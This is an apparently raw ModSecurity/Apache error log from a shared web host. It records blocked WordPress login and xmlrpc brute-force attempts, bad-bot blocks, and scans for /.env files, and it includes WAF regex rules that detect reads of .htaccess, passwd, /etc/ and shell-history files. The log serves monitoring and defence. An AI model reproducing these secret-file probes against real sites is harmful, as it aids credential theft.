[Tue May 26 12:58:16.316956 2026] [security2:error] [pid 470766:tid 470804] [remote 172.194.139.254:14299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.139.194.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVLkOjO_W1DqEcFHQ7XqgAAByU"]
[Tue May 26 12:58:18.075644 2026] [security2:error] [pid 470766:tid 470965] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLkejO_W1DqEcFHQ7XvQAAAEU"]
[Tue May 26 12:58:18.467354 2026] [security2:error] [pid 470766:tid 470928] [client 51.68.111.218:18403] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "pestcontroldelhi.co.in"] [uri "/robots.txt"] [unique_id "ahVLkujO_W1DqEcFHQ7X0QAAACA"]
[Tue May 26 12:58:18.467490 2026] [security2:error] [pid 470766:tid 470928] [client 51.68.111.218:18403] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "pestcontroldelhi.co.in"] [uri "/robots.txt"] [unique_id "ahVLkujO_W1DqEcFHQ7X0QAAACA"]
[Tue May 26 12:58:19.347930 2026] [security2:error] [pid 470766:tid 470997] [client 216.26.238.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVLk-jO_W1DqEcFHQ7X4gAAAGU"], referer: https://anujtradingco.com/
[Tue May 26 12:58:20.851312 2026] [security2:error] [pid 470766:tid 470968] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLlOjO_W1DqEcFHQ7X9wAAAEg"]
[Tue May 26 12:58:22.833545 2026] [security2:error] [pid 470766:tid 470938] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLlujO_W1DqEcFHQ7YFgAAACo"]
[Tue May 26 12:58:25.297367 2026] [security2:error] [pid 470766:tid 470950] [client 92.50.32.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVLmOjO_W1DqEcFHQ7YQgAAADY"]
[Tue May 26 12:58:25.867420 2026] [security2:error] [pid 470766:tid 470959] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLmejO_W1DqEcFHQ7YTAAAAD8"]
[Tue May 26 12:58:26.369208 2026] [security2:error] [pid 470766:tid 470914] [client 157.20.138.61:52006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLmujO_W1DqEcFHQ7YYwAAABI"]
[Tue May 26 12:58:26.369339 2026] [security2:error] [pid 470766:tid 470914] [client 157.20.138.61:52006] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLmujO_W1DqEcFHQ7YYwAAABI"]
[Tue May 26 12:58:28.542554 2026] [security2:error] [pid 470766:tid 470956] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLnOjO_W1DqEcFHQ7YhQAAADw"]
[Tue May 26 12:58:30.597691 2026] [security2:error] [pid 470766:tid 471023] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLnujO_W1DqEcFHQ7YqwAAAH8"]
[Tue May 26 12:58:31.332712 2026] [security2:error] [pid 470766:tid 470779] [remote 173.249.21.166:42628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVLn-jO_W1DqEcFHQ7YtwAAfAw"]
[Tue May 26 12:58:33.803845 2026] [security2:error] [pid 470766:tid 470971] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLoejO_W1DqEcFHQ7Y2wAAAEs"]
[Tue May 26 12:58:36.349912 2026] [security2:error] [pid 470766:tid 470951] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLo-jO_W1DqEcFHQ7ZEQAAADc"]
[Tue May 26 12:58:36.999363 2026] [security2:error] [pid 470766:tid 470908] [client 157.20.138.61:52368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLpOjO_W1DqEcFHQ7ZJwAAAAw"]
[Tue May 26 12:58:36.999474 2026] [security2:error] [pid 470766:tid 470908] [client 157.20.138.61:52368] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLpOjO_W1DqEcFHQ7ZJwAAAAw"]
[Tue May 26 12:58:38.655675 2026] [security2:error] [pid 470766:tid 471006] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLpujO_W1DqEcFHQ7ZQQAAAG4"]
[Tue May 26 12:58:39.106033 2026] [security2:error] [pid 470766:tid 470952] [client 34.78.162.75:52162] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "208.91.198.85"] [uri "/"] [unique_id "ahVLp-jO_W1DqEcFHQ7ZSAAAADg"]
[Tue May 26 12:58:41.833864 2026] [security2:error] [pid 470766:tid 471005] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLqejO_W1DqEcFHQ7ZbwAAAG0"]
[Tue May 26 12:58:43.037378 2026] [core:crit] [pid 470766:tid 470937] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:58:43.396423 2026] [core:crit] [pid 470766:tid 471014] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:58:43.624988 2026] [core:crit] [pid 470766:tid 470918] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:58:44.436513 2026] [security2:error] [pid 470766:tid 470928] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLrOjO_W1DqEcFHQ7ZmgAAACA"]
[Tue May 26 12:58:45.161255 2026] [security2:error] [pid 470766:tid 470993] [client 74.7.230.59:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.support.mosykay.com"] [uri "/index.php"] [unique_id "ahVLrejO_W1DqEcFHQ7ZqQAAAGE"]
[Tue May 26 12:58:45.162126 2026] [security2:error] [pid 470766:tid 470975] [client 74.7.230.59:52476] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.support.mosykay.com"] [uri "/robots.txt"] [unique_id "ahVLrejO_W1DqEcFHQ7ZpwAAT1Y"]
[Tue May 26 12:58:46.457873 2026] [security2:error] [pid 470766:tid 470929] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLrujO_W1DqEcFHQ7ZxQAAACE"]
[Tue May 26 12:58:47.458798 2026] [security2:error] [pid 470766:tid 470995] [client 157.20.138.61:52730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLr-jO_W1DqEcFHQ7Z2QAAAGM"]
[Tue May 26 12:58:47.458923 2026] [security2:error] [pid 470766:tid 470995] [client 157.20.138.61:52730] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLr-jO_W1DqEcFHQ7Z2QAAAGM"]
[Tue May 26 12:58:48.140890 2026] [security2:error] [pid 470766:tid 470969] [client 223.109.255.206:38051] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVLsOjO_W1DqEcFHQ7Z4AAAAEk"], referer: http://pic.sogou.com
[Tue May 26 12:58:48.229493 2026] [security2:error] [pid 470766:tid 470909] [client 142.147.196.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVLr-jO_W1DqEcFHQ7Z3AAAAA0"]
[Tue May 26 12:58:48.725718 2026] [security2:error] [pid 470766:tid 471005] [client 157.48.246.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLsOjO_W1DqEcFHQ7Z5QAAAG0"]
[Tue May 26 12:58:49.728752 2026] [security2:error] [pid 470766:tid 470913] [client 176.65.139.229:54694] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.observance111.svijaykumar.in"] [uri "/.env"] [unique_id "ahVLsejO_W1DqEcFHQ7Z-gAAABE"]
[Tue May 26 12:58:49.776814 2026] [security2:error] [pid 470766:tid 471000] [client 176.65.139.236:48030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.rabbanitradingcompany.svijaykumar.in"] [uri "/.env"] [unique_id "ahVLsejO_W1DqEcFHQ7Z-wAAAGg"]
[Tue May 26 12:58:50.026088 2026] [security2:error] [pid 470766:tid 470957] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLsejO_W1DqEcFHQ7Z-QAAAD0"]
[Tue May 26 12:58:51.712751 2026] [security2:error] [pid 470766:tid 471019] [client 176.65.139.235:20596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.katalystconsulting.svijaykumar.in"] [uri "/.env"] [unique_id "ahVLs-jO_W1DqEcFHQ7aFQAAAHs"]
[Tue May 26 12:58:52.311566 2026] [security2:error] [pid 470766:tid 470949] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLs-jO_W1DqEcFHQ7aGAAAADU"]
[Tue May 26 12:58:54.054814 2026] [security2:error] [pid 470766:tid 470998] [client 176.65.139.237:29878] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rabbanitradingcompany.com"] [uri "/.env"] [unique_id "ahVLtujO_W1DqEcFHQ7aSwAAAGY"]
[Tue May 26 12:58:57.185904 2026] [security2:error] [pid 470766:tid 471014] [client 85.208.96.206:55882] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVLuejO_W1DqEcFHQ7ajwAAAHY"]
[Tue May 26 12:58:57.186130 2026] [security2:error] [pid 470766:tid 471014] [client 85.208.96.206:55882] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVLuejO_W1DqEcFHQ7ajwAAAHY"]
[Tue May 26 12:58:57.626252 2026] [security2:error] [pid 470766:tid 470950] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLuejO_W1DqEcFHQ7akgAAADY"]
[Tue May 26 12:58:57.977892 2026] [security2:error] [pid 470766:tid 470929] [client 157.20.138.61:53087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLuejO_W1DqEcFHQ7apAAAACE"]
[Tue May 26 12:58:57.978051 2026] [security2:error] [pid 470766:tid 470929] [client 157.20.138.61:53087] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLuejO_W1DqEcFHQ7apAAAACE"]
[Tue May 26 12:59:00.242558 2026] [security2:error] [pid 470766:tid 470966] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLu-jO_W1DqEcFHQ7azgAAAEY"]
[Tue May 26 12:59:00.716510 2026] [security2:error] [pid 470766:tid 470974] [client 66.249.64.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVLvOjO_W1DqEcFHQ7a4wAAAE4"]
[Tue May 26 12:59:00.717011 2026] [security2:error] [pid 470766:tid 470988] [client 66.249.64.96:58347] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVLvOjO_W1DqEcFHQ7a2wAAAFw"]
[Tue May 26 12:59:02.765233 2026] [security2:error] [pid 470766:tid 470920] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLvujO_W1DqEcFHQ7bAAAAABg"]
[Tue May 26 12:59:05.088739 2026] [security2:error] [pid 470766:tid 470956] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLwOjO_W1DqEcFHQ7bNQAAADw"]
[Tue May 26 12:59:08.018447 2026] [security2:error] [pid 470766:tid 470899] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLw-jO_W1DqEcFHQ7bdQAAAAM"]
[Tue May 26 12:59:08.272324 2026] [security2:error] [pid 470766:tid 470885] [remote 74.7.241.58:59282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVLxOjO_W1DqEcFHQ7bjAAACnY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/fields
[Tue May 26 12:59:08.538738 2026] [security2:error] [pid 470766:tid 470904] [client 14.169.240.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLxOjO_W1DqEcFHQ7bhQAAAAg"]
[Tue May 26 12:59:08.586154 2026] [security2:error] [pid 470766:tid 470979] [client 157.20.138.61:53441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLxOjO_W1DqEcFHQ7bkQAAAFM"]
[Tue May 26 12:59:08.586320 2026] [security2:error] [pid 470766:tid 470979] [client 157.20.138.61:53441] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLxOjO_W1DqEcFHQ7bkQAAAFM"]
